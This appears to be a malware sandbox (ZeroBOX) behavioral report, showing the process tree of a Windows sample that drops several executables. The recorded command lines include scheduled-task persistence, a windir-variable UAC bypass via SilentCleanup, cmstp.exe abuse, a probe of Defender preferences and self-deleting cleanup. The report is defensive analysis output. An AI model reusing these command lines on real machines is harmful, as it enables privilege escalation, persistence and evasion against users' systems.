| ZeroBOX

zxcv.EXE "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
2260
- GFDyrtucbvfdg.exe "C:\ProgramData\GFDyrtucbvfdg.exe"
  1836
  - GFDyrtucbvfdg.exe "C:\ProgramData\GFDyrtucbvfdg.exe"
    1632
- DSFnbyhgfrtydfg.exe "C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe"
  2084
  - DSFnbyhgfrtydfg.exe "C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe"
    2364
    - cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit
      2548
      - taskkill.exe taskkill /pid 2364
        2228
- zxcv.EXE "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
  1812
  - 4tWOdlbY5p.exe "C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe"
    2412
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp"
      3724
  - j6VXXENS27.exe "C:\Users\test22\AppData\Local\Temp\j6VXXENS27.exe"
    1472
    - cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
      932
      - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
        3084
        
        reg.exe reg delete hkcu\Environment /v windir /f
        3168
        
        reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
        3212
        
        schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        3256
    - cmd.exe cmd /c ""C:\Users\Public\nest.bat" "
      3512
      - reg.exe reg delete hkcu\Environment /v windir /f
        3572
  - crS9EKo8sM.exe "C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe"
    2300
    - crS9EKo8sM.exe "{path}"
      4024
      - cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\b3hfotbm.inf
        3112
  - V6QfXKl0VE.exe "C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe"
    2488
    - V6QfXKl0VE.exe "{path}"
      3180
      - powershell.exe "powershell" Get-MpPreference -verbose
        3088
  - Y9vZMbEz1g.exe "C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe"
    808
    - Y9vZMbEz1g.exe "C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe"
      3332
      - schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
        3404
  - cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE"
    2440
    - timeout.exe timeout /T 10 /NOBREAK
      1756
explorer.exe C:\Windows\Explorer.EXE
1848

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents